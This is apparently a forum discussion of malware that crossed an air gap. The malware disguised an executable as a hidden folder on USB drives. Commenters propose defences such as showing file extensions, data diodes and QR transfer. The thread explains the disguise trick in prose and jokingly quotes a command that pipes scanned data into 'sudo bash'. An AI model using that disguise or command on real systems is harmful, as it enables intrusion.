I think the things to blame here are the design of Windows and the overall design of the air-gapped environment.
Yes, at the end of the day you're going to need to move stuff from non-air-gapped devices to air-gapped devices and vice-versa. You can assume the non-air-gapped devices are completely compromised. But why is the air-gapped device not configured to always show file extensions?
This is literally working because Windows is configured to hide common file extensions, and the attack relies on hiding a folder and replacing it with an executable with a folder icon and the same name +.exe.
If you're designing an airgapped system, this is literally the first thing you should be worried about after ensuring that the system is actually airgapped.
At least windows explorer should have been configured to show extensions (and some training delivered to ensure that the people using these systems have the diligence to notice unusual file extensions with familiar looking icons).
It would be even better if the file explorer was replaced with something less easy to fool. Something which does not load custom icons, never hides directories, and maybe even prevents access if the flash drive has indications of shenanigans (unusually named files, executables, hidden folders) which would indicate something weird was going on.
It's a good job that unlike with Stuxnet nobody plugged in a flash drive from the literal car park, but this is pretty poor on the part of the people designing/implementing the airgapped environment.
> If you're designing an airgapped system, this is literally the first thing you should be worried about after ensuring that the system is actually airgapped.
And next time if some other airgapped vuln is reported, that will be literally the first thing people should be worried about! God, people are so stupid, if only they would just do literally the first things they should be worried about.
>if only they would just do literally the first things they should be worried about.
as the sibling comments to this one pointed out, most people change the default Explorer settings, first thing.
In fact changing the default Explorer settings has been a security warning for years.
In conclusion, yes I believe if something is in a common list of things you should do to make your windows system more secure (for like, people who are not security experts) and you don't do it then probably "God, people are so stupid" is a reasonable response.
In conclusion, yes, I believe if something is in a common list of things that people (who are not security experts) should do to make their system more secure and the developer of that system refuses to make that the default, then "God, that developer is so stupid" is a reasonable response.
I wouldn't blame most people for not changing this setting.
Except air-gapped systems should be setup by security experts, so stupidity all 'round.
Good point re. Windows’s default configuration being less secure due to file extensions being hidden. This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility. I think the root cause is that Microsoft thinks files ending in .EXE are ugly (but they don’t want to stop using this convention, which I don’t think is strictly required by the kernel or filesystem, but would probably break other things in the OS and 3rd party tools), so they hide that and all other file extensions (which maybe they also think are ugly, but I don’t see an alternative since files with multiple data
streams are not handled well for interchange). Not sure why the default isn’t just to hide the extension of executable files, though I think this is more trouble than it is worth, for the reasons demonstrated by this attack.
I would also consider disabling USB ports in air-gapped systems. You can still buy PS/2 keyboards and mice. Server and maybe some workstation motherboards still have PS/2 ports (and there are PS/2 PCI cards). For sneakernet file transfer you can allow use of an SD card. That way, if you see a USB cable or other device in an air-gapped environment, it should be an immediate red flag.
>This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility. I think the root cause is that Microsoft thinks files ending in .EXE are ugly (but they don’t want to stop using this convention, which I don’t think is strictly required by the kernel or filesystem, but would probably break other things in the OS and 3rd party tools), so they hide that
I don't think they're think the extension is "ugly". I think they expect their users to think that way, on average, and don't want to deal with being told such (or getting support requests because ignorant users tried to remove that part of the filename and now can't open Word or whatever).
I wouldn't call it the result of backwards compatibility, either - although Windows' level of backwards compatibility is insane and does impose a continuous tax. But in the current case, there would need to be a new system for inferring executability before we could talk about removing the existing one. AFAIK Windows uses file headers to determine the format of an executable file (i.e. how to load it), but not to decide whether a given file should be deemed executable at all. And the attrib bits, also AFAIK, don't include anything for execution either.
>I would also consider disabling USB ports in air-gapped systems.
I assume they aren't worried about "BadUSB" type attacks because they're in control of the physical media used for transfer.
> or getting support requests because ignorant users tried to remove that part of the filename and now can't open Word or whatever
Funny side story, windows pops an error confirmation message if you change or remove the extension of a file name as part of a rename operation.
There's no way to disable this message outside of writing an autohotkey script to check for the prompt and auto-accept it. (I did this once, no I don't have the AHK script, but I don't recall it being hard to write.)
On on a similar funny side note, there's no way to tell windows to always open files with no extension in a specified application (e.g. gvim). But you can edit the registry to do it.
Having to deal with other people using it is far more obnoxious than actually personally using it, IMX. For sophisticated users it's not hard to learn these details, and then one naturally just doesn't hit the pitfalls. Teaching the details to someone less sophisticated, and making them stick, is a whole other ball game.
> This is another manifestation of the continuous tax paid for Windows’s insane level of backward compatibility
Well, no. This bulshit was introduced later by Microsoft to make Windows more "user friendly". In the same line like truncating URLs in briwser bars by Google and Mozilla.
For that matter, would they ever need to move anything executable? Seems to me on Linux they could have just set up a preemptive `chmod -x` of everything copied in from the drive.
For many years I've just viewed all of my devices as possibly compromised. It's one of the reasons I've been very down on cryptocurrencies in general. I don't actually see USB as something that can maintain a true, robust airgap, because the amount of data transferred is not inspectable.
In my view, the best use of an airgapped machine would be for storage of extremely dense and sensitive information such as cryptographic keys. Signing or encryption should be accomplished through an inspectable data channel requiring manual interaction such as QR codes. When every bit in and out of a machine serves a purpose, it's much less likely to leak.
Example: show a qr code to a camera on the airgapped machine and get a qr code on the screen containing the signature of the data presented to it. There is very little room for nefarious code execution or data transmission.
How about a USB "MITM" device that presents itself as a serial port to the OS when the user connects a USB storage device.
The user would then use a terminal emulator to connect to something like a BBS[1] where they could browse files, and download or upload files to the connected USB storage device using XMODEM[2] like in the good old days.
edit: It could of course also filter the files, for example not list any executable files, and prevent transfer of executable files based on scanning their contents.
The MITM device would be implemented using a microcontroller with signed firmware, and careful design to prevent a connected USB device to do shenanigans like voltage glitching. This would include using isolated DC-DC and isolated data lines ala like this[3].
The MITM would only interact with the storage device class. If the connected device presents itself as more, say a keyboard, it would just ignore those.
The user must be prevented from bypassing the MITM device, though this could be done through physical means.
I like it. Seems like it might be useful for mice and keyboards as well.
Have a few ports on it:
This device can only be a mouse -> USB
This device can only be a keyboard -> USB
Then it filters everything coming in to ensure that it matches the desired type of activity.
For USB drives, I'm tempted to say it should read the USB drive once, and copy all information to internal storage in order to prevent data being sent to the usb via timed or coordinated reads. This would allow a truly read only thumbdrive.
Back in a day I've made proof of concept of animated QR codes using fountain codes - txqr. [1] Since then I received a bunch of requests to make into an actual cross-platform app, but never could find the time for this hobby project. I guess I should revive this project and make an usable open-source app.
This is probably a decent use case for plain old serial. Interface via application defined TTY.
On the other hand no matter the transport you’re probably going to get owned by well known vulnerabilities in any software processing data from the internet-connected side, if you’re using the air gap as an excuse to avoid patching or otherwise caring about secure coding practices.
Then you’re still at the mercy of the TTY application being secure. Having to go through the analog hole makes it much more difficult.
As for patching, you would ensure a secure root of trust and only allow read-only media to deliver said updates as another sibling points out
Air gapping is still valuable but it’s still hard to impossible. For example, stuxnet was delivered by an insider. So good physical security and monitoring is also needed to prevent against insider threats.
I think of the sensitive, air-gapped information as an infection. If an old and “infected” machine needs upgrading then it’s easier to put a new, freshly upgraded machine into the infected area, copy the sensitive data over to the new machine, then incinerate the old one.
Anything that does come out of the infected area in-tact has to be cleaned or inspected carefully to ensure it is free of the “sensitive data” infection.
That would happen in a secure environment with auditors and multiple sysadmins who would have the ability to do things normally disallowed. Different threat model
"Patching" is the fundamental reason airgapping isn't a sound solution, IMO. If you're a TLA you can probably find some secure, verifiable, write-only way to transfer patches to your air gapped machines. But for any normal person/organization; you'll very likely end up less secure due to how hard this is.
You can use DVD-Rs to load a WSUS server for Windows or a package mirror for Linux, I’d just be surprised if many airgapped operators were keeping on top of this.
I'm imagining a "secure slate" you can carry between the computers, a tiny tablet with a camera, e-ink display, and replaceable batteries. It does nothing but snap a picture of a QR code and then (if error checking is OK) reproduces it on its own durable display. Add a write-protection switch that doubles as a cover on the camera-lens, and have it auto-blank when not in use.
So you'd snapshot its QR code, hand-carry the slate to air-gapped Computer B, press a button to wake it up, brandish the "copied" QR code in front of B's camera, etc. Maybe even take one and (with careful labeling) put it into a safe, depending on how long you plan to store it.
You could do something similar with a camera and thermal-paper printer, but then the physical artifact needs to be reliably destroyed by manual effort, as opposed to auto-erasure.
With appropriate encryption between the two machines, the slate could even be a simple smartphone.
It doesn't matter whether the smartphone is internet-connected or not, as the slate's contents wouldn't be of any use without hacking one of the machines, and if you could do that, you wouldn't need to hack the slate in the first place.
For longer term storage use an analog camera to take pictures of the QR codes, then develop the film and store them in an airtight climate controlled vault. Bonus points if the film is designed to be very stable after developing. Maybe platinum prints with lots of error correction.
Well, the context is a facility where security must be so tight that you're air-gapping computers in the first place, so a lot of the same reasons nobody would be permitted to bring their personal film-camera into the place either: You don't want to make it easy for people to take pictures of arbitrary things (faces, documents, whiteboards) and you don't want to always be searching everyone's underwear for instant-photos or film-canisters.
In contrast, a worker can sign-out a hardened device, and when they return it on the way out you can be reasonably sure they couldn't have easily made copies. Plus the scanner won't capture arbitrary pictures in the first place, and it can be set to auto-wipe after X minutes of inactivity.
If you give people 10 unexposed sheets and require them to return a total of 10 used/unused on the way out, that's susceptible to them smuggling in an unexposed sheet, and you're back to underwear searches again.
This is interesting. Another use for such a secure machine would be to enter text, eg highly controversial blog entries or erotic stories. Then any common computer or phone with a camera can be used to transfer the text using 2D barcodes.
This would be a bit slow: say a barcode. If we assume a single barcode can hold 1500 characters (text twice as long as your comment), a blog entry may need 4-5 barcodes. Not undoable.
Such a machine would not have a camera, WiFi, BT, or any input or output mechanism of any kind.
I mean, this thread has itself very clearly turned into some crypto-fetishist fan fiction, completely departed from reality. I guess it’s just what came to mind.
You nailed the term I didn’t know I was looking for, that’s exactly it! As a fantasy I’ve thought about creating a secret identity and have researched how to keep it absolutely safe. This is very hard and you can spend quite a bit of time designing ever elaborate schemes.
Ok, that was the first time I heard the phrase ( recreational paranoia ) and I am now lost in a sea of links. Can you elaborate on it? It sounds fascinating to me from context alone.
Yes. But using USB devices has a practically infinitely greater attack surface that parsing data embedded in a QR Code. It's not like yo have to read QR Codes and go "echo $QRData | sudo bash"
"BadUSB is a computer security attack using USB devices that are programmed with malicious software.[2] For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a malicious device.[3] This attack works by programming the fake USB flash drive to emulate a keyboard. Once it is plugged into a computer, it is automatically recognized and allowed to interact with the computer. It can than then initiate a series of keystrokes which open a command window and issue commands to download malware. " -- https://en.wikipedia.org/wiki/BadUSB
The Soviets had a strong typewriter implant game[0]. They might have to revive some of their old tradecraft to either deliver implants via the card punches, or monitor what is being sent over the air gap.
I considered saying bearish. Maybe I could have been clearer.
I have a low opinion about the usefulness of cryptocurrencies because true security is so difficult. It's basically impossible, even if you don't make any mistakes.
I really enjoy this kind of stuff, and loved reading about the z-cash ceremony. I'm not going to those lengths to protect my secrets, so I feel it's better if I don't hold a lot of wealth in such a fragile way.
I used to like it, but now I don't. It's still neat, but it's too prone to costly mistakes.
Bullish and bearish are common stock market terms[1] meaning optimistic and pessimistic. Hawkish means advocating war, which doesn't clearly align with optimistic or pessimistic.
The first time I tried to type a long public key it took me like 10 minutes, and was a pain in the butt. If it's something you're doing a lot, using QR codes can make it much faster and easier.
Why does anyone run an operating system that grants ambient authority to executables?
This is analogous to a power grid stripped of all fuses and circuit breakers to make it easier to design toasters.
We've studied this problem since 1972[1]. Solutions were found (but the Internet Archive is down, so I can't be sure [2] points to the right files now).
People had drawn and quartered Microsoft because of simple access elevation prompts (UAC) in Vista, let alone a granular permissions system. It had to be dumbed down significantly over the years to be widely accepted.
You can't just present the user with something that amounts to a "Press OK to continue" dialog, and call them stupid when they press OK, and call them whiney when they think it's annoying.
What Apple is doing is significantly better. Instead of a single popup that grants access to everything and shows before the app even opens. You can granularly accept or deny individual access to things. And the program keeps working when you decline.
Okay, but permission prompts as such are not why people complained. Sure, of course you don't want apps to record your screen without permission. The problem is Apple has taken away your right to even grant this permission, for more than a week, unless they also consent (and extract a fee from the app developer). It's part of their ongoing frog-boiling campaign to remove users' freedom to run arbitrary software on Macs; this is what people object to.
You can make an argument that UAC was part of a similar strategy, but not paying for an EV certificate only results in a one-time annoyance for your users, not a continuous one. UAC is equivalent to Gatekeeper. This permissions nonsense is worse than UAC.
Do you want to give your wallet to the cashier? (Yes/No)
Computers don't have to be that stupid about it, it was someone inside Microsoft being passive aggressive instead of actually
doing their job and presenting
useful options at runtime, that resulted in the horror that was UAC.
I would imagine these tools use exploits in the existing executables to deliver the payload, and then - if I understand correctly, use scripting/interpreted languages (Python) to run the operation.
So, even if you’d need admin confirmation to run each new binary, it wouldn’t help - because no new binaries are
executed, just python with a new set of scripts.
And, correct me if I’m wrong, but preventing os from running new scripts would be virtually impossible.
AFAIK it only worked with optical drives, not pendrives. I've spent hours trying to get this functionality on my pendrives back in the day, to no avail (thankfully!). It was on Windows XP, and Windows 98 needed external drivers to even use pendrives at all, so if such an attack vector existed, it must have been on Windows 2000 or Me (i.e between XP and 98), so an arguably very short time frame (if at all!).
I don't remember the whole details, but I believe it installed an autorun.inf file on all USB drives so that inserting the drive on another PC would install it automatically.
I once designed and built an air-gapped system and it did not involve operators plugging USB devices to and from MS Windows machines. (We used data diodes).
It is strange to me that a security-conscious organisation such as a ministry of foreign affairs would build an air-gapped system this way. Possibly it's a compliance checklist item from their parent organisation, but with no oversight?
The US has "forward deployed" state department personnel that handle information security of embassies and consulates in a standardised way, probably this SE asian country (and the EU organisation) should follow suit.
The US has a history of major data breaches by low rank IT security personnel throughout multiple branches of the government. A security monoculture is not necessarily a great approach on the balance of things.
They do and did use many methods of communication and the pagers were just one part of it. Excatly to not be reliant on conventional computers and their insecurities, but seemingly easy and secure devices. They just did not expect the sophistication of the Mossad to hijack the production facilities.
My understanding from the description of the attack is that it didn't rely on any vulnerability in USB, only social engineering made possible by the Windows UI.
Given that air gapped American government machines would be vulnerable to similar techniques, why don’t common operating systems build mechanisms to make this stuff more difficult?
* force prompting executing anything off external media
* disallow anything other than input devices for USB
* disallow unsigned binaries from running
* work to require usb peripherals to carry a unique cryptographic signature so that you can easily lock the set of allowed devices once the machine is set up
Heck, a lot of this stuff could be valuable to help secure corporate IT machines too.
About 20 years ago, I was setting up a shared PC at my university. I googled for a way in Windows XP (via registry or group policy) to only let specific programs run. I added stuff like explorer.exe, iexplore.exe, winword.exe, acroread.exe, and a few others.
Fast forward a few years, and the computer was still running great. The desktop and downloads folders were full of messengers, "flash players" and other malware - but all binaries were throwing cryptic error. Since no one in IT was around or cared, nobody figured out how to edit the allow list. The computer was deemed half-broken. But when neighboring PCs were completely infested, this one could still open, edit, and print office docs flawlessly.
It felt like a magic fix for shared Windows PC security.
Edit: one of those exes was regedit and every time I sat down I'd delete all the keys named Policies as a routine excersize. After that, restart explorer with one of the tricks. I don't remember the specific one but it wasn't officially documented iirc.
Since 2008 or so all US government computers on SIPR block USB storage devices are unless they are on an approved list. Autorun is disabled.
Physical security is another big factor, there is a long checklist for a SCIF that at some level takes into account TEMPEST type threats that mitigate many attacks on air gapped systems.
And none of these things are the default on commercial software because users want it to be frictionless. They want software to install right away when you plug in a usb drive, etc.
I don't think that would have protected against this attack. I think it was the users' workflow to plug USB drives into non airgapped computers, then into the airgapped computers. So those USB drives would be put on the approved list, and also be used by the attackers.
Would you agree that perhaps executables whose origin is a usb drive should be treated as equivalent to a browser download and unconditionally get a prompt to execute even if it was copied off the usb? I think it’s naive to think that our own security wouldn’t be helped by improving software measures even if it does risk our own offensive capabilities - we have very advanced and well funded adversaries ourselves
Getting the balance between security and usability right is tricky. It doesn’t make sense to have to click yes to trust software when you run it a hundred times a week, pretty quickly you are just clicking and not actually considering the risk. At the same time, for an airgapped systems where updates are rarely installed and the impact is much higher it makes sense to only allow whitelisted software and prompt each time
It does prevent you accidentally running something that you didn't expect to be an executable in the first place as is the case here. I doubt you're running executables off of USB drives hundreds of times a week on air gapped machines.
To my understanding, none of that would have been relevant here. Users copied the executable (disguised as a folder) from the external media (which was one of their own devices, and would have been in the "set of allowed devices" under such a scheme) which was a perfectly normal input device (not some BadUSB hack). It probably wouldn't be hard to get a malware launcher appear "signed", either. Even if we disallow self-signing, the launcher only needs to be a wrapper to start Python (which can be supplied alongside). Such wrappers are provided by Python[1]. I don't know if these are signed normally, but it seems pretty easy to imagine.
All the technical "hacking" happened on the non-air-gapped side, so that that computer would put malware onto the USB with a deceptive presentation (an .exe with an icon to look like a folder and with the same name as an expected folder, while the actual folder was hidden). The rest is social engineering (and Windows not showing the .exe extension).
[1]: `pip3.exe` is an example; it's hard-coded to run the Pip module from `site-packages`, but `pip.py` could be replaced. More to the point, these wrappers are automatically created by Setuptools, to run an arbitrary script specified in the build process, from a "stub" included with Setuptools. (All of this is to work around the lack of support for shebangs, of course.) I don't know if Setuptools can or does sign these wrappers. Probably not.
We recently started enforcing a policy of scanning external media before letting it be usable by the system and the time it takes for MBAM to scan a flash drive takes so long it's driven the most complaints of any IT policy change we've made. Some people are just so latched on to that floppy disk lifestyle that the only change to their workflow in decades has been what part of the computer they put their storage in.
These are all standard security requirements for NATO accredited systems.
The human drive for convenience and perhaps a bit darker, to rebel against rules, will always serve as pathways to compromise. And in the case of a powerful hostile actor, bribing someone.
>* disallow anything other than input devices for USB
I think that will greatly reduce the ability to get work done. It's my understanding that the workflow for using these specific airgapped computers involved moving USB thumb drives between computers.
I've been wondering lately how these USB execution attacks happen. Surely no modern system auto-runs things from a USB, so there has to be some kind of executable on the drive which the user of the drive either A. Expects to be there, or B. Doesn't notice is there. A sounds a bit strange, but maybe the system is updated over USB, that means that the hackers got into the update pipeline which is very bad. B might be more likely, create an EXE with the thumbnail of an image and maybe you could trick a user into clicking it. Or maybe some nefarious excel macro. But in this case it's strange that the system allows these things to be executed.
Does anyone have more details on how this is done?
> It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
THAT would probably ensure the user does not suspect anything nefarious has happened, even after the fact.
Now how Windows Defender and other heuristics based firewalls would not treat the malicious EXE with folder icon as a threat and quarantine it immediately -- I dont know.
>how Windows Defender and other heuristics based firewalls would not treat the malicious EXE with folder icon as a threat and quarantine it immediately -- I dont know.
The "malicious" exe, as I understood it, just boots up Python to run a script, where the actual malice lies. Windows Defender has to treat an executable that does only this as benign - because Python's packaging tools provide such executables (so that Windows users can get applications - including (upgrades to) Pip itself - from PyPI that "just work" in a world without shebangs and +x bits). For that matter, standard tools like Setuptools could well have been used as part of crafting the malware suite.
Presumably they could notice that an .exe has the normal folder icon. But presumably that icon could also be slightly modified in ways that would defeat heuristic recognition but still appear like a folder icon to a not-especially-attentive human.
>Does the malware EXE that now looks like a Folder icon with same name as the last modified actual folder (which is now hidden) ... also redirect the user to the actual folder and its contents in file Explorer after successfully delivering its malicious payload?
I didn't see anything about that in the description of the attack. But I assume that the Python script could accomplish this by just making an appropriate `subprocess.run` call to `explorer.exe`.
And also, which person setting up an air gapped system allows execution from a removable media? You'd think with that level of paranoia you'd have a couple more rules in place.
There are many ways. A simple way is to simulate a USB hub with an input device and a usb drive. You use the input device to execute whatever is on the drive. Another way is to identify as a device whose driver has some vulnerability. Windows auto-installs that driver, then you exploit it.
Sure, if you're the one who created the USB drive then you could make it not actually a USB drive. But this sounds like an infected machine infecting previously safe USB drives and turn them into malicious ones. And I'm not sure I get how a USB drive can be turned malicious. I vaguely remember there was a bit you could flip in older USB drives to make them appear as disk drives and enable autorun, but I doubt that's how this is done.
I think its the firmware. Outside of the main drive, there are smaller chips that work with the OS to r/w the main drive. Each chip has firmware whose memory is usually r/w as well.
Once you can manipulate the code on the firmware, its probably pretty easy to find a kernel level exploit.
> simulate a USB hub with an input device and a usb drive
Yea but that has to be a custom or specific kind of programmable USB device. Or one that somehow unintentionally allows you to reflash its firmware to something else.
And also if anyone ever plugs your malicious USB device into a Mac, they will get a pop-up from macOS that asks you to identify the keyboard. Although maybe if it fakes a specific USB keyboard that macOS knows out of the box, you could avoid that?
>It is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself with the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to entice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.
Mac and Gnome do too. I think somehow overlaying that it’s an executable and double-checking if you want to execute from a removable drive might be better techniques than worrying about file extensions which only help people who know what they’re doing already (in which case it’s common to configure the UI to show those extensions)
No. Colorblindness does not mean that one does not see any colors. There is only a tiny fraction of colorblind people who really cannot see any colors, and even they can still spot different luminances.
Allowing the user to run an executable directly off a USB drive seems like a very bad idea for an air-gapped computer. It's hard to imagine a scenario where this would be necessary.
Copying the "folder" onto the local machine first wouldn't have helped, though. It would still be an executable, and the user would still be enticed to double-click it (because it would still appear to be a folder which the user expected to contain desired files). We could fall back to "allowing the user to use a GUI to select files seems like a very bad idea when they come from the other side of an air gap", but at some point a concession has to be made to usability.
The problems here are to do with how Windows uses and presents file extensions.
Every well-funded nationstate has an "equations group", but it is rare to detect, much less publicize, their actions by design.
External buses and RF comms present massive attack surfaces that must be locked down with religious fervor including auditing, disabling, and management.
So running programs by sticking in a USB drive is a critical security bug. Have Microsoft reported this to the European Union within a day? Is Microsoft now going to be fined 2.5% of their turn over now from the Cyber Resilience Act?
I worked in a data center situation once where there was a physical switch that disconnected the outside network connection which was turned on only in very special circumstances. The USB ports were filled with super-glue.
I always thought that the big switch was probably still a massive vulnerability - is it air-gapped or not? When the switch is flicked it only takes milliseconds for an exploit.
Anyway, not sure what happened to those guys in the end.
Is it just me that thinks "USB device plugged in" != "airgapped"??
Heck every TV show has someone downloading the nuclear plans off Dr. Evil's laptop by...plugging in a USB device when he's distracted by spilling his coffee.
This is exactly why Qubes OS has been developed, with its strong hardware-assisted virtualization. All USB devices belong to a dedicated VM, which is reset every time it's restarted. My daily driver, can't recommend it enough! https://qubes-os.org
Did I get it wrong or the infection was through USB? I thought it was something related to a remote/wireless attack. Is such attack even possible on air-gapped systems?
In my experience it doesn’t stop admins connecting an “offline Root CA” to the WiFi network to install their entire suite of server management software — none of which are functional without an active network connection.
Yes, my plan was to physically remove the wifi adapter daughter card. They exposed the CA to gigabytes of third-party software before I turned up to do the setup. Yes, I warned them not to even take the computer out of the box.
Offline anything just breaks people’s brains.
“How do we keep the anti-virus pattern file up to date?”
Do they still make non-USB mice/keyboards? I am also wondering if the CEC HDMI protocol could be exploited. Plugin a nefarious monitor which can send a payload and receive a graphic stream back with the response.
We used a Dell workstation laptop, which has ECC memory and a Xeon processor like a server. Built-in keyboard and trackpad reduces the risk of random external devices needing to be used.
Protection was BitLocker drive encryption with a manually entered (long!) passphrase to decrypt. Backups were to encrypted USB media never plugged into anything else other than a redundant clone of the CA used for DR testing. Everything went into safes.
This design works Well Enough for all but the most demanding purposes, but the whole rigmarole was undone by a well-meaning but naive admin “just doing his job”.
Yup. PS2 keyboard and mice are still easy to find. As are VGA monitors. If you are super paranoid, you still need something more, as both PS2 and VGA allow for bidirectional transfer. But, at a certain point you need to trust your supply chain. If someone can tamper with your new monitor, they can probably tamper with your new server as well.
Even without compromising the host, you wouldn't want a monitor mirroring the output to an attacker, or a keyboard mirroring every stroke.
Perhaps the issue author thought the member was given this name because only privileged/blessed developers get to use the “cool stuff” of React. They likely don’t understand the reason why the concept of access modifiers exist in many programming languages.
Namely that (good) library authors will do everything possible to avoid breaking the public API, which can be seen as a “promise” from them in what can be relied upon, while internal/private members offer no such promises and the library author can feel free to change/remove them as desired with no prior notice.
Well, a proper air gapped system would have zero surface area to the outside world, isn't it? Like desoldered USB/Firewire/whatever ports is a basic thing to do. I had a colocated server where the usbs were neutered this way and had an internal USB riser which had the port removed and facing inwards, so if you took the system apart you could plug in something, but that means offline time.
This was more like a controlled environment, but everyone knows that USB/WIFI is a steaming shitpile, with its own firmware and other shit.
It's unclear to me why you believe this is relevant here. This attack indeed uses different tooling, and a completely different attack vector (social engineering via the presentation of a malicious executable in the GUI, as opposed to an auto-run exploit).
A lot of people ITT don't seem to understand very well what's going on with this attack. The Ars Technica article doesn't seem very well written, but we've had previous discussion[0].
Quick FAQ:
> Haven't we known about USB vulnerabilities forever (agent.btz, BadUSB etc.)?
The fact that USB devices were used to transfer the files is irrelevant to the attack.
The attack doesn't depend on running the malware directly off the USB device, on any kind of auto-run vulnerability, etc. It would have worked out the same way if files had been transferred, for example, by burning them to DVD. The attack only depends on the machines on the non-air-gapped side, being compromised such that the attackers can control what is put onto the USB. But the USB drives themselves are only being used as dumb storage here.
The attack instead primarily depends on social engineering that is helped along by the design of the Windows GUI. On the air-gapped machine, the user sees a "folder" which is actually an executable file. By default, Windows hides the .exe file extension (which it uses to determine executability of the file) in the GUI; and the icon can be customized. Double-clicking thus launches the malware installer when it was only supposed to open a folder. The folder has a name that the user expected to see (modulo the hidden extension).
It appears that the original setup involves hiding[1] (but still copying) the folder that was supposed to be transferred, and then renaming the malware to match. (Presumably, the malware could then arrange for Windows to open the hidden folder "normally", as part of its operation.) Windows can be configured to show "hidden" files (like `ls -a`), but it isn't the default.
Notice that this is social engineering applied only to the process of attempting to view the files - nobody was persuaded to use any storage devices "from outside".
> Isn't that, like, not actually air gapped?
The definition of an air gap generally allows for files to be passed across the air gap. Which is all the attack really depends on. See also "sneakernet". The point is that you can easily monitor and control all the transfers. But this attack is possible in spite of that control, because of the social engineering.
> How is it possible to exfiltrate data this way?
The actual mechanism isn't clearly described in media coverage so far, from what I can tell. But presumably, once malware is set up on the air-gapped machine, it copies the files back onto the USB, hiding them. When the device is transferred back to the non-air-gapped side, malware already present there monitors for the USB being plugged in, retrieves the files and uploads them (via the "GoldenMailer" or "GoldenDrive" components) elsewhere.
[1]: Windows file systems generally don't have an "executable bit" for files, but do have a "hidden bit", rather than relying on a leading-dot filename convention. So it's the opposite of what Linux does.
> Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the Internet-connected device, the data is transferred to an attacker-controlled server.
This implies the ability to turn a common USB drive into a vector for malware.
Yes, at the end of the day you're going to need to move stuff from non-air-gapped devices to air-gapped devices and vice-versa. You can assume the non-air-gapped devices are completely compromised. But why is the air-gapped device not configured to always show file extensions?
This is literally working because Windows is configured to hide common file extensions, and the attack relies on hiding a folder and replacing it with an executable with a folder icon and the same name +.exe.
If you're designing an airgapped system, this is literally the first thing you should be worried about after ensuring that the system is actually airgapped.
At least windows explorer should have been configured to show extensions (and some training delivered to ensure that the people using these systems have the diligence to notice unusual file extensions with familiar looking icons).
It would be even better if the file explorer was replaced with something less easy to fool. Something which does not load custom icons, never hides directories, and maybe even prevents access if the flash drive has indications of shenanigans (unusually named files, executables, hidden folders) which would indicate something weird was going on.
It's a good job that unlike with Stuxnet nobody plugged in a flash drive from the literal car park, but this is pretty poor on the part of the people designing/implementing the airgapped environment.
And next time if some other airgapped vuln is reported, that will be literally the first thing people should be worried about! God, people are so stupid, if only they would just do literally the first things they should be worried about.
as the sibling comments to this one pointed out, most people change the default Explorer settings, first thing.
In fact changing the default Explorer settings has been a security warning for years.
In conclusion, yes I believe if something is in a common list of things you should do to make your windows system more secure (for like, people who are not security experts) and you don't do it then probably "God, people are so stupid" is a reasonable response.
I wouldn't blame most people for not changing this setting.
Except air-gapped systems should be setup by security experts, so stupidity all 'round.
I would also consider disabling USB ports in air-gapped systems. You can still buy PS/2 keyboards and mice. Server and maybe some workstation motherboards still have PS/2 ports (and there are PS/2 PCI cards). For sneakernet file transfer you can allow use of an SD card. That way, if you see a USB cable or other device in an air-gapped environment, it should be an immediate red flag.
I don't think they're think the extension is "ugly". I think they expect their users to think that way, on average, and don't want to deal with being told such (or getting support requests because ignorant users tried to remove that part of the filename and now can't open Word or whatever).
I wouldn't call it the result of backwards compatibility, either - although Windows' level of backwards compatibility is insane and does impose a continuous tax. But in the current case, there would need to be a new system for inferring executability before we could talk about removing the existing one. AFAIK Windows uses file headers to determine the format of an executable file (i.e. how to load it), but not to decide whether a given file should be deemed executable at all. And the attrib bits, also AFAIK, don't include anything for execution either.
>I would also consider disabling USB ports in air-gapped systems.
I assume they aren't worried about "BadUSB" type attacks because they're in control of the physical media used for transfer.
Funny side story, windows pops an error confirmation message if you change or remove the extension of a file name as part of a rename operation.
There's no way to disable this message outside of writing an autohotkey script to check for the prompt and auto-accept it. (I did this once, no I don't have the AHK script, but I don't recall it being hard to write.)
On on a similar funny side note, there's no way to tell windows to always open files with no extension in a specified application (e.g. gvim). But you can edit the registry to do it.
> On on a similar funny side note,
Those things are only funny if you don't have to use this "Operating System" hours a day. Because then it becomes a PITA.
Well, no. This bulshit was introduced later by Microsoft to make Windows more "user friendly". In the same line like truncating URLs in briwser bars by Google and Mozilla.
In my view, the best use of an airgapped machine would be for storage of extremely dense and sensitive information such as cryptographic keys. Signing or encryption should be accomplished through an inspectable data channel requiring manual interaction such as QR codes. When every bit in and out of a machine serves a purpose, it's much less likely to leak.
Example: show a qr code to a camera on the airgapped machine and get a qr code on the screen containing the signature of the data presented to it. There is very little room for nefarious code execution or data transmission.
The user would then use a terminal emulator to connect to something like a BBS[1] where they could browse files, and download or upload files to the connected USB storage device using XMODEM[2] like in the good old days.
edit: It could of course also filter the files, for example not list any executable files, and prevent transfer of executable files based on scanning their contents.
The MITM device would be implemented using a microcontroller with signed firmware, and careful design to prevent a connected USB device to do shenanigans like voltage glitching. This would include using isolated DC-DC and isolated data lines ala like this[3].
The MITM would only interact with the storage device class. If the connected device presents itself as more, say a keyboard, it would just ignore those.
The user must be prevented from bypassing the MITM device, though this could be done through physical means.
[1]: https://en.wikipedia.org/wiki/Bulletin_board_system
[2]: https://en.wikipedia.org/wiki/XMODEM
[3]: https://ez.analog.com/ez-blogs/b/engineerzone-spotlight/post...
Have a few ports on it: This device can only be a mouse -> USB This device can only be a keyboard -> USB
Then it filters everything coming in to ensure that it matches the desired type of activity.
For USB drives, I'm tempted to say it should read the USB drive once, and copy all information to internal storage in order to prevent data being sent to the usb via timed or coordinated reads. This would allow a truly read only thumbdrive.
https://divan.dev/posts/animatedqr/
